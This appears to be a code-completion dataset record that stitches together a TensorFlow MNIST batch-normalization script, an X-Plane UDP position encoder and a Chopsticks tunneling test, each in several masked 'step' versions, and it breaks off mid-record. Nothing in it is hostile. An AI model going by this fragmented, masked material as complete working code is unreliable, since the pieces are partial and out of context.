conv_layer = tf.layers.batch_normalization(conv_layer, training=is_training)
conv_layer = tf.nn.relu(conv_layer)
return conv_layer
num_batches = 3000
batch_size = 128
learning_rate = 0.002
layer_num = 5
batch_norm = True
inputs = tf.placeholder(tf.float32, [None, 28, 28, 1])
labels = tf.placeholder(tf.float32, [None, 10])
is_training = tf.placeholder(tf.bool)
layer = inputs
for layer_i in range(1, 1+layer_num):
layer = conv_layer(layer, layer_i, batch_norm, is_training)
orig_shape = layer.get_shape().as_list()
layer = tf.reshape(layer, shape=[-1, orig_shape[1] * orig_shape[2] * orig_shape[3]])
layer = fully_connected(layer, 100, batch_norm, is_training)
logits = tf.layers.dense(layer, 10)
model_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=logits, labels=labels))
tf.summary.scalar('conv_loss',model_loss)
if batch_norm:
with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):
#train_opt = tf.train.GradientDescentOptimizer(learning_rate).minimize(model_loss)
#train_opt = tf.train.RMSPropOptimize(learning_rate).minimize(model_loss)
train_opt = tf.train.AdamOptimizer(learning_rate).minimize(model_loss)
else:
train_opt = tf.train.GradientDescentOptimizer(learning_rate).minimize(model_loss)
#train_opt = tf.train.RMSPropOptimize(learning_rate).minimize(model_loss)
#train_opt = tf.train.AdamOptimizer(learning_rate).minimize(model_loss)
correct_prediction = tf.equal(tf.argmax(logits,1), tf.argmax(labels,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
with tf.Session() as sess:
merged = tf.summary.merge_all()
if batch_norm:
logdir = "mnist/conv/SGD_batchnorm"
else:
logdir = "mnist/conv/SGD_no_batchnorm"
writer = tf.summary.FileWriter(logdir, sess.graph)
sess.run(tf.global_variables_initializer())
for batch_i in range(num_batches):
batch_xs, batch_ys = mnist.train.next_batch(batch_size)
_,summary = sess.run([train_opt,merged], {inputs: batch_xs, labels: batch_ys, is_training: True})
writer.add_summary(summary, batch_i)
if batch_i % 500 == 0:
loss, acc = sess.run([model_loss, accuracy], {inputs: mnist.validation.images, labels: mnist.validation.labels, is_training: False})
print('Batch: {:>2}: Validation loss: {:>3.5f}, Validation accuracy: {:>3.5f}'.format(batch_i, loss, acc))
elif batch_i % 100 == 0:
loss, acc = sess.run([model_loss, accuracy], {inputs: batch_xs, labels: batch_ys, is_training: False})
print('Batch: {:>2}: Training loss: {:>3.5f}, Training accuracy: {:>3.5f}'.format(batch_i, loss, acc))
acc = sess.run(accuracy, {inputs: mnist.validation.images, labels: mnist.validation.labels,is_training: False})
print('Final validation accuracy: {:>3.5f}'.format(acc))
acc = sess.run(accuracy, {inputs: mnist.test.images, labels: mnist.test.labels,is_training: False})
print('Final test accuracy: {:>3.5f}'.format(acc))
|
normal
|
{
"blob_id": "17b3f51779bda5a48c4d77c35d6bbdd2aadb13cd",
"index": 1432,
"step-1": "<mask token>\n\n\ndef fully_connected(prev_layer, num_units, batch_norm, is_training=False):\n layer = tf.layers.dense(prev_layer, num_units, use_bias=False,\n activation=None)\n if batch_norm:\n layer = tf.layers.batch_normalization(layer, training=is_training)\n layer = tf.nn.relu(layer)\n return layer\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef fully_connected(prev_layer, num_units, batch_norm, is_training=False):\n layer = tf.layers.dense(prev_layer, num_units, use_bias=False,\n activation=None)\n if batch_norm:\n layer = tf.layers.batch_normalization(layer, training=is_training)\n layer = tf.nn.relu(layer)\n return layer\n\n\ndef conv_layer(prev_layer, layer_depth, batch_norm, is_training=False):\n if layer_depth % 3 == 0:\n strides = 2\n else:\n strides = 1\n conv_layer = tf.layers.conv2d(prev_layer, layer_depth * 4, 3, strides,\n 'same', use_bias=False, activation=None)\n if batch_norm:\n conv_layer = tf.layers.batch_normalization(conv_layer, training=\n is_training)\n conv_layer = tf.nn.relu(conv_layer)\n return conv_layer\n\n\n<mask token>\nfor layer_i in range(1, 1 + layer_num):\n layer = conv_layer(layer, layer_i, batch_norm, is_training)\n<mask token>\ntf.summary.scalar('conv_loss', model_loss)\nif batch_norm:\n with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):\n train_opt = tf.train.AdamOptimizer(learning_rate).minimize(model_loss)\nelse:\n train_opt = tf.train.GradientDescentOptimizer(learning_rate).minimize(\n model_loss)\n<mask token>\nwith tf.Session() as sess:\n merged = tf.summary.merge_all()\n if batch_norm:\n logdir = 'mnist/conv/SGD_batchnorm'\n else:\n logdir = 'mnist/conv/SGD_no_batchnorm'\n writer = tf.summary.FileWriter(logdir, sess.graph)\n sess.run(tf.global_variables_initializer())\n for batch_i in range(num_batches):\n batch_xs, batch_ys = mnist.train.next_batch(batch_size)\n _, summary = sess.run([train_opt, merged], {inputs: batch_xs,\n labels: batch_ys, is_training: True})\n writer.add_summary(summary, batch_i)\n if batch_i % 500 == 0:\n loss, acc = sess.run([model_loss, accuracy], {inputs: mnist.\n validation.images, labels: mnist.validation.labels,\n is_training: False})\n print(\n 'Batch: {:>2}: Validation loss: {:>3.5f}, Validation accuracy: {:>3.5f}'\n .format(batch_i, loss, acc))\n elif batch_i % 100 == 0:\n loss, acc = sess.run([model_loss, accuracy], {inputs: batch_xs,\n labels: batch_ys, is_training: False})\n print(\n 'Batch: {:>2}: Training loss: {:>3.5f}, Training accuracy: {:>3.5f}'\n .format(batch_i, loss, acc))\n acc = sess.run(accuracy, {inputs: mnist.validation.images, labels:\n mnist.validation.labels, is_training: False})\n print('Final validation accuracy: {:>3.5f}'.format(acc))\n acc = sess.run(accuracy, {inputs: mnist.test.images, labels: mnist.test\n .labels, is_training: False})\n print('Final test accuracy: {:>3.5f}'.format(acc))\n",
"step-3": "<mask token>\nmnist = input_data.read_data_sets('MNIST_data/', one_hot=True, reshape=False)\n\n\ndef fully_connected(prev_layer, num_units, batch_norm, is_training=False):\n layer = tf.layers.dense(prev_layer, num_units, use_bias=False,\n activation=None)\n if batch_norm:\n layer = tf.layers.batch_normalization(layer, training=is_training)\n layer = tf.nn.relu(layer)\n return layer\n\n\ndef conv_layer(prev_layer, layer_depth, batch_norm, is_training=False):\n if layer_depth % 3 == 0:\n strides = 2\n else:\n strides = 1\n conv_layer = tf.layers.conv2d(prev_layer, layer_depth * 4, 3, strides,\n 'same', use_bias=False, activation=None)\n if batch_norm:\n conv_layer = tf.layers.batch_normalization(conv_layer, training=\n is_training)\n conv_layer = tf.nn.relu(conv_layer)\n return conv_layer\n\n\nnum_batches = 3000\nbatch_size = 128\nlearning_rate = 0.002\nlayer_num = 5\nbatch_norm = True\ninputs = tf.placeholder(tf.float32, [None, 28, 28, 1])\nlabels = tf.placeholder(tf.float32, [None, 10])\nis_training = tf.placeholder(tf.bool)\nlayer = inputs\nfor layer_i in range(1, 1 + layer_num):\n layer = conv_layer(layer, layer_i, batch_norm, is_training)\norig_shape = layer.get_shape().as_list()\nlayer = tf.reshape(layer, shape=[-1, orig_shape[1] * orig_shape[2] *\n orig_shape[3]])\nlayer = fully_connected(layer, 100, batch_norm, is_training)\nlogits = tf.layers.dense(layer, 10)\nmodel_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=\n logits, labels=labels))\ntf.summary.scalar('conv_loss', model_loss)\nif batch_norm:\n with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):\n train_opt = tf.train.AdamOptimizer(learning_rate).minimize(model_loss)\nelse:\n train_opt = tf.train.GradientDescentOptimizer(learning_rate).minimize(\n model_loss)\ncorrect_prediction = tf.equal(tf.argmax(logits, 1), tf.argmax(labels, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\nwith tf.Session() as sess:\n merged = tf.summary.merge_all()\n if batch_norm:\n logdir = 'mnist/conv/SGD_batchnorm'\n else:\n logdir = 'mnist/conv/SGD_no_batchnorm'\n writer = tf.summary.FileWriter(logdir, sess.graph)\n sess.run(tf.global_variables_initializer())\n for batch_i in range(num_batches):\n batch_xs, batch_ys = mnist.train.next_batch(batch_size)\n _, summary = sess.run([train_opt, merged], {inputs: batch_xs,\n labels: batch_ys, is_training: True})\n writer.add_summary(summary, batch_i)\n if batch_i % 500 == 0:\n loss, acc = sess.run([model_loss, accuracy], {inputs: mnist.\n validation.images, labels: mnist.validation.labels,\n is_training: False})\n print(\n 'Batch: {:>2}: Validation loss: {:>3.5f}, Validation accuracy: {:>3.5f}'\n .format(batch_i, loss, acc))\n elif batch_i % 100 == 0:\n loss, acc = sess.run([model_loss, accuracy], {inputs: batch_xs,\n labels: batch_ys, is_training: False})\n print(\n 'Batch: {:>2}: Training loss: {:>3.5f}, Training accuracy: {:>3.5f}'\n .format(batch_i, loss, acc))\n acc = sess.run(accuracy, {inputs: mnist.validation.images, labels:\n mnist.validation.labels, is_training: False})\n print('Final validation accuracy: {:>3.5f}'.format(acc))\n acc = sess.run(accuracy, {inputs: mnist.test.images, labels: mnist.test\n .labels, is_training: False})\n print('Final test accuracy: {:>3.5f}'.format(acc))\n",
"step-4": "import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets('MNIST_data/', one_hot=True, reshape=False)\n\n\ndef fully_connected(prev_layer, num_units, batch_norm, is_training=False):\n layer = tf.layers.dense(prev_layer, num_units, use_bias=False,\n activation=None)\n if batch_norm:\n layer = tf.layers.batch_normalization(layer, training=is_training)\n layer = tf.nn.relu(layer)\n return layer\n\n\ndef conv_layer(prev_layer, layer_depth, batch_norm, is_training=False):\n if layer_depth % 3 == 0:\n strides = 2\n else:\n strides = 1\n conv_layer = tf.layers.conv2d(prev_layer, layer_depth * 4, 3, strides,\n 'same', use_bias=False, activation=None)\n if batch_norm:\n conv_layer = tf.layers.batch_normalization(conv_layer, training=\n is_training)\n conv_layer = tf.nn.relu(conv_layer)\n return conv_layer\n\n\nnum_batches = 3000\nbatch_size = 128\nlearning_rate = 0.002\nlayer_num = 5\nbatch_norm = True\ninputs = tf.placeholder(tf.float32, [None, 28, 28, 1])\nlabels = tf.placeholder(tf.float32, [None, 10])\nis_training = tf.placeholder(tf.bool)\nlayer = inputs\nfor layer_i in range(1, 1 + layer_num):\n layer = conv_layer(layer, layer_i, batch_norm, is_training)\norig_shape = layer.get_shape().as_list()\nlayer = tf.reshape(layer, shape=[-1, orig_shape[1] * orig_shape[2] *\n orig_shape[3]])\nlayer = fully_connected(layer, 100, batch_norm, is_training)\nlogits = tf.layers.dense(layer, 10)\nmodel_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=\n logits, labels=labels))\ntf.summary.scalar('conv_loss', model_loss)\nif batch_norm:\n with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):\n train_opt = tf.train.AdamOptimizer(learning_rate).minimize(model_loss)\nelse:\n train_opt = tf.train.GradientDescentOptimizer(learning_rate).minimize(\n model_loss)\ncorrect_prediction = tf.equal(tf.argmax(logits, 1), tf.argmax(labels, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\nwith tf.Session() as sess:\n merged = tf.summary.merge_all()\n if batch_norm:\n logdir = 'mnist/conv/SGD_batchnorm'\n else:\n logdir = 'mnist/conv/SGD_no_batchnorm'\n writer = tf.summary.FileWriter(logdir, sess.graph)\n sess.run(tf.global_variables_initializer())\n for batch_i in range(num_batches):\n batch_xs, batch_ys = mnist.train.next_batch(batch_size)\n _, summary = sess.run([train_opt, merged], {inputs: batch_xs,\n labels: batch_ys, is_training: True})\n writer.add_summary(summary, batch_i)\n if batch_i % 500 == 0:\n loss, acc = sess.run([model_loss, accuracy], {inputs: mnist.\n validation.images, labels: mnist.validation.labels,\n is_training: False})\n print(\n 'Batch: {:>2}: Validation loss: {:>3.5f}, Validation accuracy: {:>3.5f}'\n .format(batch_i, loss, acc))\n elif batch_i % 100 == 0:\n loss, acc = sess.run([model_loss, accuracy], {inputs: batch_xs,\n labels: batch_ys, is_training: False})\n print(\n 'Batch: {:>2}: Training loss: {:>3.5f}, Training accuracy: {:>3.5f}'\n .format(batch_i, loss, acc))\n acc = sess.run(accuracy, {inputs: mnist.validation.images, labels:\n mnist.validation.labels, is_training: False})\n print('Final validation accuracy: {:>3.5f}'.format(acc))\n acc = sess.run(accuracy, {inputs: mnist.test.images, labels: mnist.test\n .labels, is_training: False})\n print('Final test accuracy: {:>3.5f}'.format(acc))\n",
"step-5": "import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True, reshape=False)\n\ndef fully_connected(prev_layer, num_units, batch_norm, is_training=False):\n layer = tf.layers.dense(prev_layer, num_units, use_bias=False, activation=None)\n if batch_norm:\n layer = tf.layers.batch_normalization(layer, training=is_training)\n layer = tf.nn.relu(layer)\n return layer\n\ndef conv_layer(prev_layer, layer_depth, batch_norm, is_training=False):\n\tif layer_depth % 3 == 0:\n\t strides = 2\n\telse:\n\t\tstrides = 1\n\tconv_layer = tf.layers.conv2d(prev_layer, layer_depth*4, 3, strides, 'same', use_bias=False, activation=None)\n\tif batch_norm:\n\t\tconv_layer = tf.layers.batch_normalization(conv_layer, training=is_training)\n\tconv_layer = tf.nn.relu(conv_layer)\n\treturn conv_layer\n\n\nnum_batches = 3000\nbatch_size = 128\nlearning_rate = 0.002\nlayer_num = 5\nbatch_norm = True\n\ninputs = tf.placeholder(tf.float32, [None, 28, 28, 1])\nlabels = tf.placeholder(tf.float32, [None, 10])\nis_training = tf.placeholder(tf.bool)\n\nlayer = inputs\nfor layer_i in range(1, 1+layer_num):\n layer = conv_layer(layer, layer_i, batch_norm, is_training)\n\norig_shape = layer.get_shape().as_list()\n\nlayer = tf.reshape(layer, shape=[-1, orig_shape[1] * orig_shape[2] * orig_shape[3]])\nlayer = fully_connected(layer, 100, batch_norm, is_training)\n\nlogits = tf.layers.dense(layer, 10)\nmodel_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=logits, labels=labels))\ntf.summary.scalar('conv_loss',model_loss)\n\nif batch_norm: \n with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):\n #train_opt = tf.train.GradientDescentOptimizer(learning_rate).minimize(model_loss)\n\t\t#train_opt = tf.train.RMSPropOptimize(learning_rate).minimize(model_loss)\n train_opt = tf.train.AdamOptimizer(learning_rate).minimize(model_loss)\nelse:\n train_opt = tf.train.GradientDescentOptimizer(learning_rate).minimize(model_loss)\n\t#train_opt = tf.train.RMSPropOptimize(learning_rate).minimize(model_loss)\n\t#train_opt = tf.train.AdamOptimizer(learning_rate).minimize(model_loss)\n\ncorrect_prediction = tf.equal(tf.argmax(logits,1), tf.argmax(labels,1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n \n\nwith tf.Session() as sess:\n\tmerged = tf.summary.merge_all()\n\tif batch_norm: \n\t\tlogdir = \"mnist/conv/SGD_batchnorm\"\n\telse:\n\t\tlogdir = \"mnist/conv/SGD_no_batchnorm\"\n\twriter = tf.summary.FileWriter(logdir, sess.graph)\n\n\tsess.run(tf.global_variables_initializer())\n\tfor batch_i in range(num_batches):\n\t\tbatch_xs, batch_ys = mnist.train.next_batch(batch_size)\n\n\t\t_,summary = sess.run([train_opt,merged], {inputs: batch_xs, labels: batch_ys, is_training: True})\n\t\t\n\t\twriter.add_summary(summary, batch_i)\n\n\t\tif batch_i % 500 == 0:\n\t\t\tloss, acc = sess.run([model_loss, accuracy], {inputs: mnist.validation.images, labels: mnist.validation.labels, is_training: False})\n\t\t\tprint('Batch: {:>2}: Validation loss: {:>3.5f}, Validation accuracy: {:>3.5f}'.format(batch_i, loss, acc))\n\t\telif batch_i % 100 == 0:\n\t\t\tloss, acc = sess.run([model_loss, accuracy], {inputs: batch_xs, labels: batch_ys, is_training: False})\n\t\t\tprint('Batch: {:>2}: Training loss: {:>3.5f}, Training accuracy: {:>3.5f}'.format(batch_i, loss, acc))\n\n\tacc = sess.run(accuracy, {inputs: mnist.validation.images, labels: mnist.validation.labels,is_training: False})\n\tprint('Final validation accuracy: {:>3.5f}'.format(acc))\n\tacc = sess.run(accuracy, {inputs: mnist.test.images, labels: mnist.test.labels,is_training: False})\n\tprint('Final test accuracy: {:>3.5f}'.format(acc))",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
class XPlaneDataOut:
def __init__(self, host: str, port: int) ->None:
self.address = host, port
self.socket = socket.socket(family=socket.AF_INET, type=socket.
SOCK_DGRAM)
def write(self, data: Position) ->None:
self.socket.sendto(_encode(data), self.address)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def _encode(position: Position) ->bytes:
return _START_BUFFER + struct.pack('<fff', position.latitude, position.
longitude, position.altitude
) + _END_BUFFER + _START_TRANSPONDER + struct.pack('<f', position.
transponder) + _END_TRANSPONDER
class XPlaneDataOut:
def __init__(self, host: str, port: int) ->None:
self.address = host, port
self.socket = socket.socket(family=socket.AF_INET, type=socket.
SOCK_DGRAM)
def write(self, data: Position) ->None:
self.socket.sendto(_encode(data), self.address)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
_START_BUFFER = bytes([68, 65, 84, 65, 60, 20, 0, 0, 0])
_END_BUFFER = bytes([0] * 20)
_START_TRANSPONDER = bytes([104, 0, 0, 0, 0, 0, 0, 0])
_END_TRANSPONDER = bytes([0] * 24)
def _encode(position: Position) ->bytes:
return _START_BUFFER + struct.pack('<fff', position.latitude, position.
longitude, position.altitude
) + _END_BUFFER + _START_TRANSPONDER + struct.pack('<f', position.
transponder) + _END_TRANSPONDER
class XPlaneDataOut:
def __init__(self, host: str, port: int) ->None:
self.address = host, port
self.socket = socket.socket(family=socket.AF_INET, type=socket.
SOCK_DGRAM)
def write(self, data: Position) ->None:
self.socket.sendto(_encode(data), self.address)
<|reserved_special_token_1|>
import socket
import struct
from fsuipc_airspaces.position import Position
_START_BUFFER = bytes([68, 65, 84, 65, 60, 20, 0, 0, 0])
_END_BUFFER = bytes([0] * 20)
_START_TRANSPONDER = bytes([104, 0, 0, 0, 0, 0, 0, 0])
_END_TRANSPONDER = bytes([0] * 24)
def _encode(position: Position) ->bytes:
return _START_BUFFER + struct.pack('<fff', position.latitude, position.
longitude, position.altitude
) + _END_BUFFER + _START_TRANSPONDER + struct.pack('<f', position.
transponder) + _END_TRANSPONDER
class XPlaneDataOut:
def __init__(self, host: str, port: int) ->None:
self.address = host, port
self.socket = socket.socket(family=socket.AF_INET, type=socket.
SOCK_DGRAM)
def write(self, data: Position) ->None:
self.socket.sendto(_encode(data), self.address)
<|reserved_special_token_1|>
import socket
import struct
from fsuipc_airspaces.position import Position
# Adapted from tools/faker.js in github.com/foucdeg/airspaces
_START_BUFFER = bytes([68, 65, 84, 65, 60, 20, 0, 0, 0])
_END_BUFFER = bytes([0] * 20)
_START_TRANSPONDER = bytes([104, 0, 0, 0, 0, 0, 0, 0])
_END_TRANSPONDER = bytes([0] * 24)
def _encode(position: Position) -> bytes:
return _START_BUFFER \
+ struct.pack("<fff", position.latitude, position.longitude, position.altitude) \
+ _END_BUFFER \
+ _START_TRANSPONDER \
+ struct.pack("<f", position.transponder) \
+ _END_TRANSPONDER
class XPlaneDataOut():
def __init__(self, host: str, port: int) -> None:
self.address = (host, port)
self.socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
def write(self, data: Position) -> None:
self.socket.sendto(_encode(data), self.address)
|
flexible
|
{
"blob_id": "68fa47e528e5c7c553c3c49ee5b7372b8a956302",
"index": 3364,
"step-1": "<mask token>\n\n\nclass XPlaneDataOut:\n\n def __init__(self, host: str, port: int) ->None:\n self.address = host, port\n self.socket = socket.socket(family=socket.AF_INET, type=socket.\n SOCK_DGRAM)\n\n def write(self, data: Position) ->None:\n self.socket.sendto(_encode(data), self.address)\n",
"step-2": "<mask token>\n\n\ndef _encode(position: Position) ->bytes:\n return _START_BUFFER + struct.pack('<fff', position.latitude, position.\n longitude, position.altitude\n ) + _END_BUFFER + _START_TRANSPONDER + struct.pack('<f', position.\n transponder) + _END_TRANSPONDER\n\n\nclass XPlaneDataOut:\n\n def __init__(self, host: str, port: int) ->None:\n self.address = host, port\n self.socket = socket.socket(family=socket.AF_INET, type=socket.\n SOCK_DGRAM)\n\n def write(self, data: Position) ->None:\n self.socket.sendto(_encode(data), self.address)\n",
"step-3": "<mask token>\n_START_BUFFER = bytes([68, 65, 84, 65, 60, 20, 0, 0, 0])\n_END_BUFFER = bytes([0] * 20)\n_START_TRANSPONDER = bytes([104, 0, 0, 0, 0, 0, 0, 0])\n_END_TRANSPONDER = bytes([0] * 24)\n\n\ndef _encode(position: Position) ->bytes:\n return _START_BUFFER + struct.pack('<fff', position.latitude, position.\n longitude, position.altitude\n ) + _END_BUFFER + _START_TRANSPONDER + struct.pack('<f', position.\n transponder) + _END_TRANSPONDER\n\n\nclass XPlaneDataOut:\n\n def __init__(self, host: str, port: int) ->None:\n self.address = host, port\n self.socket = socket.socket(family=socket.AF_INET, type=socket.\n SOCK_DGRAM)\n\n def write(self, data: Position) ->None:\n self.socket.sendto(_encode(data), self.address)\n",
"step-4": "import socket\nimport struct\nfrom fsuipc_airspaces.position import Position\n_START_BUFFER = bytes([68, 65, 84, 65, 60, 20, 0, 0, 0])\n_END_BUFFER = bytes([0] * 20)\n_START_TRANSPONDER = bytes([104, 0, 0, 0, 0, 0, 0, 0])\n_END_TRANSPONDER = bytes([0] * 24)\n\n\ndef _encode(position: Position) ->bytes:\n return _START_BUFFER + struct.pack('<fff', position.latitude, position.\n longitude, position.altitude\n ) + _END_BUFFER + _START_TRANSPONDER + struct.pack('<f', position.\n transponder) + _END_TRANSPONDER\n\n\nclass XPlaneDataOut:\n\n def __init__(self, host: str, port: int) ->None:\n self.address = host, port\n self.socket = socket.socket(family=socket.AF_INET, type=socket.\n SOCK_DGRAM)\n\n def write(self, data: Position) ->None:\n self.socket.sendto(_encode(data), self.address)\n",
"step-5": "import socket\nimport struct\n\nfrom fsuipc_airspaces.position import Position\n\n\n# Adapted from tools/faker.js in github.com/foucdeg/airspaces\n_START_BUFFER = bytes([68, 65, 84, 65, 60, 20, 0, 0, 0])\n_END_BUFFER = bytes([0] * 20)\n_START_TRANSPONDER = bytes([104, 0, 0, 0, 0, 0, 0, 0])\n_END_TRANSPONDER = bytes([0] * 24)\n\n\ndef _encode(position: Position) -> bytes:\n return _START_BUFFER \\\n + struct.pack(\"<fff\", position.latitude, position.longitude, position.altitude) \\\n + _END_BUFFER \\\n + _START_TRANSPONDER \\\n + struct.pack(\"<f\", position.transponder) \\\n + _END_TRANSPONDER\n\n\nclass XPlaneDataOut():\n def __init__(self, host: str, port: int) -> None:\n self.address = (host, port)\n\n self.socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n\n def write(self, data: Position) -> None:\n self.socket.sendto(_encode(data), self.address)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
class RecursiveTest(TestCase):
<|reserved_special_token_0|>
def tearDown(self):
ls = output_lines(['docker', 'ps', '-a'])
images = []
for l in ls[1:]:
ws = l.split()
images.append(ws[-1])
assert self.docker_name not in images, 'Image %r remained running after test' % self.docker_name
def test_python_version(self):
"""We can start a sub-tunnel from within a tunnel."""
with Local() as tun:
res = tun.call(ping_docker)
self.assertEqual(res, [3, 6])
def test_depth_limit(self):
"""Recursive tunneling is limited by a depth limit."""
with self.assertRaisesRegexp(RemoteException,
'.*DepthLimitExceeded: Depth limit of 2 ' +
'exceeded at localhost -> localhost -> localhost'):
recursive()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RecursiveTest(TestCase):
docker_name = 'unittest-36'
def tearDown(self):
ls = output_lines(['docker', 'ps', '-a'])
images = []
for l in ls[1:]:
ws = l.split()
images.append(ws[-1])
assert self.docker_name not in images, 'Image %r remained running after test' % self.docker_name
def test_python_version(self):
"""We can start a sub-tunnel from within a tunnel."""
with Local() as tun:
res = tun.call(ping_docker)
self.assertEqual(res, [3, 6])
def test_depth_limit(self):
"""Recursive tunneling is limited by a depth limit."""
with self.assertRaisesRegexp(RemoteException,
'.*DepthLimitExceeded: Depth limit of 2 ' +
'exceeded at localhost -> localhost -> localhost'):
recursive()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def ping_docker():
"""Start a docker container and read out its Python version."""
with Docker('unittest-36', image='python:3.6') as tun:
return tun.call(python_version)[:2]
def recursive():
"""Infinite recursion, requiring depth limit to stop."""
with Local() as tun:
tun.call(recursive)
class RecursiveTest(TestCase):
docker_name = 'unittest-36'
def tearDown(self):
ls = output_lines(['docker', 'ps', '-a'])
images = []
for l in ls[1:]:
ws = l.split()
images.append(ws[-1])
assert self.docker_name not in images, 'Image %r remained running after test' % self.docker_name
def test_python_version(self):
"""We can start a sub-tunnel from within a tunnel."""
with Local() as tun:
res = tun.call(ping_docker)
self.assertEqual(res, [3, 6])
def test_depth_limit(self):
"""Recursive tunneling is limited by a depth limit."""
with self.assertRaisesRegexp(RemoteException,
'.*DepthLimitExceeded: Depth limit of 2 ' +
'exceeded at localhost -> localhost -> localhost'):
recursive()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from unittest import TestCase
from chopsticks.helpers import output_lines
from chopsticks.tunnel import Local, Docker, RemoteException
from chopsticks.facts import python_version
def ping_docker():
"""Start a docker container and read out its Python version."""
with Docker('unittest-36', image='python:3.6') as tun:
return tun.call(python_version)[:2]
def recursive():
"""Infinite recursion, requiring depth limit to stop."""
with Local() as tun:
tun.call(recursive)
class RecursiveTest(TestCase):
docker_name = 'unittest-36'
def tearDown(self):
ls = output_lines(['docker', 'ps', '-a'])
images = []
for l in ls[1:]:
ws = l.split()
images.append(ws[-1])
assert self.docker_name not in images, 'Image %r remained running after test' % self.docker_name
def test_python_version(self):
"""We can start a sub-tunnel from within a tunnel."""
with Local() as tun:
res = tun.call(ping_docker)
self.assertEqual(res, [3, 6])
def test_depth_limit(self):
"""Recursive tunneling is limited by a depth limit."""
with self.assertRaisesRegexp(RemoteException,
'.*DepthLimitExceeded: Depth limit of 2 ' +
'exceeded at localhost -> localhost -> localhost'):
recursive()
<|reserved_special_token_1|>
"""Test that Chopsticks remote processes can launch tunnels."""
from unittest import TestCase
from chopsticks.helpers import output_lines
from chopsticks.tunnel import Local, Docker, RemoteException
from chopsticks.facts import python_version
def ping_docker():
"""Start a docker container and read out its Python version."""
with Docker('unittest-36', image='python:3.6') as tun:
return tun.call(python_version)[:2]
def recursive():
"""Infinite recursion, requiring depth limit to stop."""
with Local() as tun:
tun.call(recursive)
class RecursiveTest(TestCase):
docker_name = 'unittest-36'
def tearDown(self):
ls = output_lines(['docker', 'ps', '-a'])
images = []
for l in ls[1:]:
ws = l.split()
images.append(ws[-1])
assert self.docker_name not in images, \
"Image %r remained running after test" % self.docker_name
def test_python_version(self):
"""We can start a sub-tunnel from within a tunnel."""
with Local() as tun:
res = tun.call(ping_docker)
self.assertEqual(
res,
[3, 6]
)
def test_depth_limit(self):
"""Recursive tunneling is limited by a depth limit."""
with self.assertRaisesRegexp(
RemoteException,
r'.*DepthLimitExceeded: Depth limit of 2 ' +
'exceeded at localhost -> localhost -> localhost'):
recursive()
|
flexible
|
{
"blob_id": "4c63072b6242507c9b869c7fd38228488fda2771",
"index": 6098,
"step-1": "<mask token>\n\n\nclass RecursiveTest(TestCase):\n <mask token>\n\n def tearDown(self):\n ls = output_lines(['docker', 'ps', '-a'])\n images = []\n for l in ls[1:]:\n ws = l.split()\n images.append(ws[-1])\n assert self.docker_name not in images, 'Image %r remained running after test' % self.docker_name\n\n def test_python_version(self):\n \"\"\"We can start a sub-tunnel from within a tunnel.\"\"\"\n with Local() as tun:\n res = tun.call(ping_docker)\n self.assertEqual(res, [3, 6])\n\n def test_depth_limit(self):\n \"\"\"Recursive tunneling is limited by a depth limit.\"\"\"\n with self.assertRaisesRegexp(RemoteException, \n '.*DepthLimitExceeded: Depth limit of 2 ' +\n 'exceeded at localhost -> localhost -> localhost'):\n recursive()\n",
"step-2": "<mask token>\n\n\nclass RecursiveTest(TestCase):\n docker_name = 'unittest-36'\n\n def tearDown(self):\n ls = output_lines(['docker', 'ps', '-a'])\n images = []\n for l in ls[1:]:\n ws = l.split()\n images.append(ws[-1])\n assert self.docker_name not in images, 'Image %r remained running after test' % self.docker_name\n\n def test_python_version(self):\n \"\"\"We can start a sub-tunnel from within a tunnel.\"\"\"\n with Local() as tun:\n res = tun.call(ping_docker)\n self.assertEqual(res, [3, 6])\n\n def test_depth_limit(self):\n \"\"\"Recursive tunneling is limited by a depth limit.\"\"\"\n with self.assertRaisesRegexp(RemoteException, \n '.*DepthLimitExceeded: Depth limit of 2 ' +\n 'exceeded at localhost -> localhost -> localhost'):\n recursive()\n",
